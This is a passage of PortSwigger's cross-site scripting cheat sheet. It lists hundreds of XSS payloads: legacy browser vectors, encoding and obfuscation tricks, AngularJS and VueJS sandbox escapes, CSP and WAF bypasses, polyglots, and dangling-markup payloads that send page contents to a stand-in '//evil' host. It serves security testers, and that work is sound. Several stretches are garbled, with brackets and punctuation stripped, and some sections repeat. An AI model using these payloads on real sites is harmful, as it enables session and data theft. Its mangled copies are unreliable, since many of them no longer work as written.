<iframe language=VBScript.Encode onload="#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@">

JavaScript entities, used to work in Netscape Navigator: <a title="&{alert(1)}">XSS</a>

JavaScript stylesheets used to be supported by Netscape Navigator: <link href="xss.js" rel=stylesheet type="text/javascript">

Button used to consume markup: <form><button name=x formaction=x><b>stealme

IE9 select elements and plaintext used to consume markup: <form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>

XBL, Firefox only <= 2:
<div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
<div style="\-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
<div style="-moz-bindin\67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
<div style="-moz-bindin&#x5c;67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">

XBL also worked in FF 3.5 using data URLs: <img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js%22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/binding%3E%3C/bindings%3E)" />

CSS expressions, <= IE7:
<div style="xss:expression(alert(1))">
<div style="xss:expression(1)-alert(1)">
<div style="xss:expressio\6e(alert(1))">
<div style="xss:expressio\006e(alert(1))">
<div style="xss:expressio\00006e(alert(1))">
<div style="xss:expressio\6e(alert(1))">
<div style="xss:expressio&#x5c;6e(alert(1))">

In quirks mode IE allowed you to use = instead of : (the second vector uses an entity for the =):
<div style="xss=expression(alert(1))">
<div style="color&#x3d;red">test</div>

Behaviors for older modes of IE: <a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>

Older versions of IE supported event handlers in functions:
<script> function window.onload(){ alert(1) } </script>
<script> function window::onload(){ alert(1) } </script>
<script> function window.location(){ } </script>
<body> <script> function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){} </script> </body>
<body> <script> function document.body.innerHTML(){ x = '<img src=1 onerror=alert(1)>' } </script> </body>

GreyMagic HTML+TIME exploit (no longer works, even in IE5 docmode): <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>

Firefox allows NULLs after &: <a href="javascript:&#x6a;avascript:alert(1)">Firefox</a> (a NUL byte sits between the & and the #; this copy does not preserve it)

Firefox allows NULLs inside named entities: <a href="javascript&colon;alert(1)">Firefox</a> (a NUL byte sits inside the entity name; this copy does not preserve it)

Firefox allows NULL characters inside opening comments (each comment opener contains a NUL byte, at a different position in the two vectors; this copy does not preserve it):
<!-- ><img title="--><iframe/onload=alert(1)>"> -->
<!-- ><img title="--><iframe/onload=alert(1)>"> -->

Safari used to allow any tag to have an onload event inside SVG: <svg><xss onload=alert(1)>

Isindex using src attribute: <isindex type=image src="//evil?

Isindex using submit: <isindex type=submit style=width:100%;height:100%; value=XSS formaction="//evil?

Isindex and formaction: <isindex type=submit formaction=javascript:alert(1)>

Isindex and action: <isindex type=submit action=javascript:alert(1)>

Credits

Brought to you by PortSwigger, lovingly constructed by Gareth Heyes.

This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin Bajanik, David Granqvist, Andrea (theMiddle) Menin, simps0n, hahwul, Paweł Hałdrzyński, Jun Kokatsu, RenwaX23, sratarun, har1sec, Yann C., gadhiyasavan, p4fg, diofeher.

You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request.

Page 10: Cross-site scripting (XSS) cheat sheet - PortSwigger€¦ · Cross-site scripting (XSS) cheat sheet This cross-site scripting (XSS) cheat sheet contains many vectors that can help

to 1 a id xss text x 20 y 20 XSS text a

SVG set tag ltsvggtltset xlinkhref=xss attributeName=href from= to=javascriptalert(1) gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt

Data protocol inside script src ltscript src=datatextjavascriptalert(1)gtltscriptgt

SVG script href attribute without closing script tag ltsvggtltscript href=datatextjavascriptalert(1) gt

SVG use element ChromeFirefox ltsvggtltuse href=dataimagesvg+xmlltsvg id=x xmlns=httpwwww3org2000svg xmlnsxlink=httpwwww3org1999xlink width=100 height=100gtlta xlinkhref=javascriptalert(1)gtltrect x=0 y=0 width=100 height=100 gtltagtltsvggtxgtltusegtltsvggt

Import statement with data URL ltscriptgtimport(datatextjavascriptalert(1))ltscriptgt

Base tag with JavaScript protocol rewriting relativeURLS

ltbase href=javascripta-alert(1)gtlta href=lolsafarihtmlgttestltagt

MathML makes any tag clickable ltmathgtltx href=javascriptalert(1)gtblah

Button and formaction ltformgtltbutton formaction=javascriptalert(1)gtXSS

Input and formaction ltformgtltinput type=submit formaction=javascriptalert(1) value=XSSgt

Form and action ltform action=javascriptalert(1)gtltinput type=submit value=XSSgt

Use element with an external URL ltsvggtltuse href=subdomain1portswigger-labsnetuse_elementuploadphpx gtltsvggt

Animate tag with keytimes and multiple values ltsvggtltanimate xlinkhref=xss attributeName=href dur=5s repeatCount=indefinite keytimes=001 values=httpsportswiggernetampsemijavascriptalert(1)ampsemi0 gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt

Other useful attributes

Using srcdoc attribute ltiframe srcdoc=ltimg src=1 onerror=alert(1)gtgtltiframegt

Using srcdoc with entities ltiframe srcdoc=ampltimg src=1 onerror=alert(1)ampgtgtltiframegt

Click a submit element from anywhere on the pageeven outside the form

ltform action=javascriptalert(1)gtltinput type=submit id=xgtltformgtltlabel for=xgtXSSltlabelgt

Hidden inputs Access key attributes can enableXSS on normally unexploitable elements

ltinput type=hidden accesskey=X onclick=alert(1)gt (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)

Link elements Access key attributes can enableXSS on normally unexploitable elements

ltlink rel=canonical accesskey=X onclick=alert(1) gt (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)

Download attribute can save a copy of the currentwebpage

lta href= download=filenamehtmlgtTestltagt

Disable referrer using referrerpolicy ltimg referrerpolicy=no-referrer src=portswigger-labsnetgt

Set windowname via parameter on the windowopenfunction

lta href= onclick=windowopen(httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)alert(1))gtXSSltagt

Set windowname via name attribute in a ltiframegt ltiframe name=alert(1) src=httpsportswigger-labsnetxssxssphp

Set do a e a a e att bute a a e

tagcontext=js_string_singleampx=27eval(name)gtltiframegt

Set windowname via target attribute in a ltbasegt tag ltbase target=alert(1)gtlta href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtXSS via target in base tagltagt

Set windowname via target attribute in a ltagt tag lta target=alert(1) href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtXSS via target in a tagltagt

Set windowname via usemap attribute in a ltimggttag

ltimg src=validimagepng width=10 height=10 usemap=xssgtltmap name=xssgtltarea shape=rect coords=0082126 target=alert(1) href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtltmapgt

Set windowname via target attribute in a ltformgt tag ltform action=httpsubdomain1portswigger-labsnetxssxssphp target=alert(1)gtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput type=submit value=XSS via target in a formgtltformgt

Set windowname via formtarget attribute in altinputgt tag type submit

ltformgtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput type=submit formaction=httpsubdomain1portswigger-labsnetxssxssphp formtarget=alert(1) value=XSS via formtarget in input type submitgtltformgt

Set windowname via formtarget attribute in altinputgt tag type image

ltformgtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput name=1 type=image src=validimagepng formaction=httpsubdomain1portswigger-labsnetxssxssphp formtarget=alert(1) value=XSS via formtarget in input type imagegtltformgt

Special tags

Redirect to a different domain ltmeta http-equiv=refresh content=0 url=portswigger-labsnetgt

Meta charset attribute UTF-7 ltmeta charset=UTF-7 gt +ADw-script+AD4-alert(1)+ADw-script+AD4-

Meta charset UTF-7 ltmeta http-equiv=Content-Type content=texthtml charset=UTF-7 gt +ADw-script+AD4-alert(1)+ADw-script+AD4-

UTF-7 BOM characters (Has to be at the start of thedocument) 1

+v8 +ADw-script+AD4-alert(1)+ADw-script+AD4-

UTF-7 BOM characters (Has to be at the start of thedocument) 2

+v9 +ADw-script+AD4-alert(1)+ADw-script+AD4-

UTF-7 BOM characters (Has to be at the start of thedocument) 3

+v+ +ADw-script+AD4-alert(1)+ADw-script+AD4-

UTF-7 BOM characters (Has to be at the start of thedocument) 4

+v +ADw-script+AD4-alert(1)+ADw-script+AD4-

Upgrade insecure requests ltmeta http-equiv=Content-Security-Policy content=upgrade-insecure-requestsgt

Disable JavaScript via iframe sandbox ltiframe sandbox src=portswigger-labsnetgtltiframegt

Disable referer ltmeta name=referrer content=no-referrergt

Encoding

Overlong UTF-8 C0BCscriptgtalert(1)ltscriptgt E080BCscriptgtalert(1)ltscriptgt F08080BCscriptgtalert(1)ltscriptgt F8808080BCscriptgtalert(1)ltscriptgt FC80808080BCscriptgtalert(1)ltscriptgt

Unicode escapes ltscriptgtu0061lert(1)ltscriptgt

Unicode escapes ES6 style ltscriptgtu61lert(1)ltscriptgt

Unicode escapes ES6 style zero padded ltscriptgtu0000000061lert(1)ltscriptgt

Hex encoding JavaScript escapes ltscriptgteval(x61lert(1))ltscriptgt

Octal encoding ltscriptgteval(141lert(1))ltscriptgt ltscriptgteval(alert(061))ltscriptgt ltscriptgteval(alert(61))ltscriptgt

Decimal encoding with optional semi-colon lta href=amp106avascriptalert(1)gtXSSltagtlta href=amp106avascriptalert(1)gtXSSltagt

SVG script with HTML encoding ltsvggtltscriptgtamp97lert(1)ltscriptgtltsvggt ltsvggtltscriptgtampx61lert(1)ltscriptgtltsvggt ltsvggtltscriptgtalertampNewLine(1)ltscriptgtltsvggt ltsvggtltscriptgtx=ampquotalert(1)ltscriptgtltsvggt

Decimal encoding with padded zeros lta href=amp0000106avascriptalert(1)gtXSSltagt

Hex encoding entities lta href=ampx6aavascriptalert(1)gtXSSltagt

Hex encoding without semi-colon provided nextcharacter is not a-f0-9

lta href=jampx61vascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt

Hex encoding with padded zeros lta href=ampx0000006aavascriptalert(1)gtXSSltagt

Hex encoding is not case sensitive lta href=ampX6Aavascriptalert(1)gtXSSltagt

HTML entities lta href=javascriptampcolonalert(1)gtXSSltagt lta href=javaampTabscriptalert(1)gtXSSltagt lta href=javaampNewLinescriptalert(1)gtXSSltagt lta href=javascriptampcolonalertamplpar1amprpargtXSSltagt

URL encoding lta href=javascriptx=27-alert(1)-27gtXSSltagt

HTML entities and URL encoding lta href=javascriptx=amppercnt27-alert(1)-27gtXSSltagt

Obfuscation

Data protocol inside script src with base64 ltscript src=datatextjavascriptbase64YWxlcnQoMSk=gtltscriptgt

Data protocol inside script src with base64 andHTML entities

ltscript src=datatextjavascriptbase64ampx59ampx57ampx78ampx6campx63ampx6eampx51ampx6fampx4dampx53ampx6bampx3dgtltscriptgt

Data protocol inside script src with base64 and URLencoding

ltscript src=datatextjavascriptbase645957786c636e516f4d536b3dgtltscriptgt

Iframe srcdoc HTML encoded ltiframe srcdoc=ampltscriptampgtalertamplpar1amprparampltampsolscriptampgtgtltiframegt

Iframe JavaScript URL with HTML and URL encoding ltiframe src=javascriptampx25ampx33ampx43ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45ampx61ampx6campx65ampx72ampx74ampx28ampx31ampx29ampx25ampx33ampx43ampx25ampx32ampx46ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45gtltiframegt

SVG script with unicode escapes and HTMLencoding

ltsvggtltscriptgtampx5campx75ampx30ampx30ampx36ampx31ampx5campx75ampx30ampx30ampx36ampx63ampx5campx75ampx30ampx30ampx36ampx35ampx5campx75ampx30ampx30ampx37ampx32ampx5campx75ampx30ampx30ampx37ampx34(1)ltscriptgtltsvggt

Client-side template injection

VueJS reflected

Version | Author | Length, followed by the vector

All versions | Mario Heiderich (Cure53) | 41
{{constructor.constructor('alert(1)')()}}

All versions | Mario Heiderich (Cure53) & Sebastian Lekies (Google), Eduardo Vela Nava (Google), Krzysztof Kotowicz (Google) | 62
<div v-html="''.constructor.constructor('alert(1)')()">a</div>

All versions | Gareth Heyes (PortSwigger) | 39
<x v-html=_c.constructor('alert(1)')()>

All versions | Peter af Geijerstam (Swedish Shellcode Factory) | 37
<x v-if=_c.constructor('alert(1)')()>

AngularJS sandbox escapes reflected

Version | Author | Length, followed by the vector

1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 41
{{constructor.constructor('alert(1)')()}}

1.0.1 - 1.1.5 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33
{{$on.constructor('alert(1)')()}}

1.2.0 - 1.2.1 | Jan Horn (Google) | 122
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

1.2.2 - 1.2.5 | Gareth Heyes (PortSwigger) | 23
)))alert(1)

1.2.6 - 1.2.18 | Jan Horn (Google) | 106
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}

1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 124
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}

1.2.24 - 1.2.29 | Gareth Heyes (PortSwigger) | 23
)))alert(1)

1.2.27 - 1.2.29, 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 23
)))alert(1)

1.3.0 | Gábor Molnár (Google) | 272
ready ampamp (ready = true) ampamp ( call $$watchers[0]get(toStringconstructorprototype) (a = apply) ampamp (apply = constructor) ampamp (valueOf = call) ampamp (+toString( F = Functionprototype + Fapply = Fa + delete Fa + delete FvalueOf + alert(1) )))

1.3.3 - 1.3.18 | Gareth Heyes (PortSwigger) | 128
{{{}[{'toString':[].join,'length':1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)')}}

1.3.19 | Gareth Heyes (PortSwigger) | 102
a[toStringfalsevalueOf[]joinlength10__proto__]charAt=[]join$eval(x=alert(1))

1.3.20 | Gareth Heyes (PortSwigger) | 65
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}

1.4.0 - 1.4.9 | Gareth Heyes (PortSwigger) | 74
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

1.5.0 - 1.5.8 | Ian Hickey & Gareth Heyes (PortSwigger) | 79
{{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}

1.5.9 - 1.5.11 | Jan Horn (Google) | 517
c=subcallb=subbinda=subapply c$apply=$applyc$eval=bop=$root$$phase $root$$phase=nullod=$root$digest$root$digest=()toString C=c$apply(c)$root$$phase=op$root$digest=od B=C(bcb)$evalAsync( astNode=pop()astNodetype=UnaryExpression astNodeoperator=(windowXvoid0(windowX=truealert(1)))+ astNodeargument=typeIdentifiernamefoo ) m1=B($$asyncQueuepop()expressionnull$root) m2=B(Cnullm1)[]pushapply=m2a=sub $eval(a(bc))[]pushapply=a

>=1.6.0 | Mario Heiderich (Cure53) | 41
{{constructor.constructor('alert(1)')()}}

>=1.6.0 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33
{{$on.constructor('alert(1)')()}}

DOM based AngularJS sandbox escapes (using orderBy or no $eval)

Version | Author | Length, followed by the vector

1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 37
constructor.constructor('alert(1)')()

1.2.0 - 1.2.18 | Jan Horn (Google) | 118
a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()

1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 119
toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)

1.2.24 - 1.2.26 | Gareth Heyes (PortSwigger) | 317
[[__proto__]][x]=constructorgetOwnPropertyDescriptorg=[[__proto__]][x][[__proto__]][y]=g(sub[[__proto__]]constructor)[[__proto__]][z]=constructordefinePropertyd=[[__proto__]][z]d(sub[[__proto__]]constructorvaluefalse)[[__proto__]][y]value(alert(1))()

1.2.27 - 1.2.29, 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 20
)))alert(1)

1.4.0 - 1.4.5 | Gareth Heyes (PortSwigger) | 75
'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';

>=1.6.0 | Mario Heiderich (Cure53) | 37
constructor.constructor('alert(1)')()

1.4.4 (without strings) | Gareth Heyes (PortSwigger) | 134
toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)

AngularJS CSP bypasses

Version | Author | Length, followed by the vector

All versions (Chrome) | Gareth Heyes (PortSwigger) | 81
<input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">

All versions (Chrome), shorter | Gareth Heyes (PortSwigger) | 56
<input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>

All versions (all browsers), shorter | Gareth Heyes (PortSwigger) | 91
<input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">

1.2.0 - 1.5.0 | Eduardo Vela (Google) | 190
<div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>

All versions (Chrome), shorter via oncut | Savan Gadhiya (NotSoSecure) | 49
<input ng-cut=$event.path|orderBy:'(y=alert)(1)'>

Scriptless attacks

Dangling markup

Background attribute: <body background="//evil? <table background="//evil? <table><thead background="//evil? <table><tbody background="//evil? <table><tfoot background="//evil? <table><td background="//evil? <table><th background="//evil?

Link href stylesheet: <link rel=stylesheet href="//evil?

Link href icon: <link rel=icon href="//evil?

Meta refresh: <meta http-equiv="refresh" content="0; http://evil?

Img to pass markup through src attribute: <img src="//evil? <image src="//evil?

Video using track element: <video><track default src="//evil?

Video using source element and src attribute: <video><source src="//evil?

Audio using source element and src attribute: <audio><source src="//evil?

Input src: <input type=image src="//evil?

Button using formaction: <form><button style="width:100%;height:100%" type=submit formaction="//evil?

Input using formaction: <form><input type=submit value=XSS style="width:100%;height:100%" type=submit formaction="//evil?

Form using action: <button form=x style="width:100%;height:100%"><form id=x action="//evil?

Object data: <object data="//evil?

Iframe src: <iframe src="//evil?

Embed src: <embed src="//evil?

Embed src: <embed src //evil?

Use textarea to consume markup and post to external site: <form><button formaction=//evil>XSS</button><textarea name=x>

Pass markup data through window.name using formtarget: <button form=x>XSS</button><form id=x action=//evil target='

Pass markup data through window.name using base target: <a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="

Pass markup data through window.name using formtarget: <form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="

Using base href to pass data: <a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss</a><base href="//evil/

Using embed window name to pass data from the page: <embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using iframe window name to pass data from the page: <iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using object window name to pass data from the page: <object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using frame window name to pass data from the page: <frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Overwrite type attribute with image in hidden inputs: <input type=hidden type=image src="//evil?

Polyglots

Polyglot payload 1: javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

Polyglot payload 2: javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>

Polyglot payload 3: javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltdetailsopenontoggle=+`++onmouseover=1+[[]+alert(PortSwiggerRes)gt

WAF bypass global objects

Each vector is shown with window as the global object; the cheat sheet lists the identical vector for self, this, top, parent, frames and globalThis, which simply take the place of window.

XSS into a JavaScript string, string concatenation: window['ale'+'rt'](window['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string, comment syntax: window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string, hex escape sequence: window['\x61\x6c\x65\x72\x74'](window['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string, hex escape sequence and base64 encoded string: window['\x65\x76\x61\x6c'](window['\x61\x6c\x65\x72\x74'](window['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, octal escape sequence: window['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, unicode escape: window['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, RegExp source property: window[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, Hieroglyphy/JSFuck: window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

Classic vectors (XSS crypt)

Image src with JavaScript protocol: <img src="javascript:alert(1)">

Body background with JavaScript protocol: <body background="javascript:alert(1)">

Iframe data URLs no longer work as modern browsers use a null origin: <iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">

VBScript protocol used to work in IE: <a href="vbscript:MsgBox+1">XSS</a> <a href="#" onclick="vbs:Msgbox+1">XSS</a> <a href="#" onclick="VBS:Msgbox+1">XSS</a> <a href="#" onclick="vbscript:Msgbox+1">XSS</a> <a href="#" onclick="VBSCRIPT:Msgbox+1">XSS</a> <a href="#" language=vbs onclick="vbscript:Msgbox+1">XSS</a>

JScript compact was a minimal version of JS that wasn't widely used in IE: <a href="#" onclick="jscript.compact:alert(1);">test</a> <a href="#" onclick="JSCRIPT.COMPACT:alert(1);">test</a>

JScript.Encode allows encoded JavaScript: <a href="#" language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a> <a href="#" onclick="JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>

VBScript.Encode allows encoded VBScript: <iframe onload="VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@"> <iframe language=VBScript.Encode onload="#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@">

JavaScript entities used to work in Netscape Navigator: <a title="&{alert(1)}">XSS</a>

JavaScript stylesheets used to be supported by Netscape Navigator: <link href="xss.js" rel=stylesheet type="text/javascript">

Button used to consume markup: <form><button name=x formaction=x><b>stealme

IE9 select elements and plaintext used to consume markup: <form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>

XBL, Firefox only <= 2: <div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="\-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-bindin\67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-bindin&#x5c;67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">

XBL also worked in FF3.5 using data URLs: <img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js%22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/binding%3E%3C/bindings%3E)">

CSS expressions <= IE7: <div style="xss:expression(alert(1))"> <div style="xss:expression(1)-alert(1)"> <div style="xss:expressio\6e(alert(1))"> <div style="xss:expressio\006e(alert(1))"> <div style="xss:expressio\00006e(alert(1))"> <div style="xss:expressio\6e(alert(1))"> <div style="xss:expressio&#x5c;6e(alert(1))">

In quirks mode IE allowed you to use = instead of : <div style="xss=expression(alert(1))"> <div style="color&#x3d;red">test</div>

Behaviors for older modes of IE: <a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>

Older versions of IE supported event handlers in functions: <script> function window.onload() { alert(1) } </script> <script> function window::onload() { alert(1) } </script> <script> function window.location() { } </script> <body> <script> function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML() { } </script> </body> <body> <script> function document.body.innerHTML() { x = "<img src=1 onerror=alert(1)>" } </script> </body>

GreyMagic HTML+time exploit (no longer works even in 5 docmode): <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>

Firefox allows NULLs after &: lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt

Firefox allows NULLs inside named entities: lta href=javascriptampcolonalert(1)gtFirefoxltagt

Firefox allows NULL characters inside opening comments: lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt

Safari used to allow any tag to have an onload event inside SVG: <svg><xss onload=alert(1)>

Isindex using src attribute: <isindex type=image src="//evil?

Isindex using submit: <isindex type=submit style=width:100%;height:100%; value=XSS formaction="//evil?

Isindex and formaction: <isindex type=submit formaction="javascript:alert(1)">

Isindex and action: <isindex type=submit action="javascript:alert(1)">

Impossible labs

Title | Description | Length limit | Closest vector

Basic context, WAF blocks <[a-zA-Z] | This lab captures the scenario when you can't use an open tag followed by an alphanumeric character. Sometimes you can solve this problem by bypassing the WAF entirely, but what about when that's not an option? Certain versions of .NET have this behaviour and it's only known to be exploitable in old IE with <%tag. | N/A | N/A

Script based injection but quotes, forward slash and backslash are escaped | We often encounter this situation in the wild: you have an injection inside a JavaScript variable and can inject angle brackets, but quotes and forward/backslashes are escaped, so you can't simply close the script block. The closest we've got to solving this is when you have multiple injection points: the first within a script based context and the second in HTML. | N/A | N/A

innerHTML context but no equals allowed | You have a site that processes the query string and URL decodes the parameters, but splits on the equals and then assigns to innerHTML. In this context <script> doesn't work and we can't use = to create an event. | N/A | N/A

Basic context, length limit | This lab's injection occurs within the basic HTML context but has a length limitation of 15. Filedescriptor came up with a vector that could execute JavaScript in 16 characters, <q/oncut=alert``, but can you beat it? | 15 | <q/oncut=alert``

Attribute context, length limit | The context of this lab is inside an attribute with a length limitation of 14 characters. We came up with a vector that executes JavaScript in 15 characters, oncut=alert``+ (the plus is a trailing space). Do you think you can beat it? | 14 | oncut=alert`` 

Basic context, length limit, arbitrary code | It's all well and good executing JavaScript, but if all you can do is call alert, what use is that? In this lab we demonstrate the shortest possible way to execute arbitrary code. | 19 | <q/oncut=eval(name)

Attribute context, length limit, arbitrary code | Again, calling alert proves you can call a function, but we created another lab to find the shortest possible attribute based injection with arbitrary JavaScript. | 17 | See link

Injection occurs inside a frameset but before the body | We received a request from Twitter about this next lab. It occurs within a frameset but before a body tag, with equals filtered. You would think you could inject a closing frameset followed by a script block, but that would be too easy. | N/A | N/A

Injection occurs inside a single quoted string, only characters a-z0-9+` are allowed | The injection occurs within a single quoted string and the challenge is to execute arbitrary code using the charset a-zA-Z0-9+`. | N/A | N/A

Credits: Brought to you by PortSwigger, lovingly constructed by Gareth Heyes.

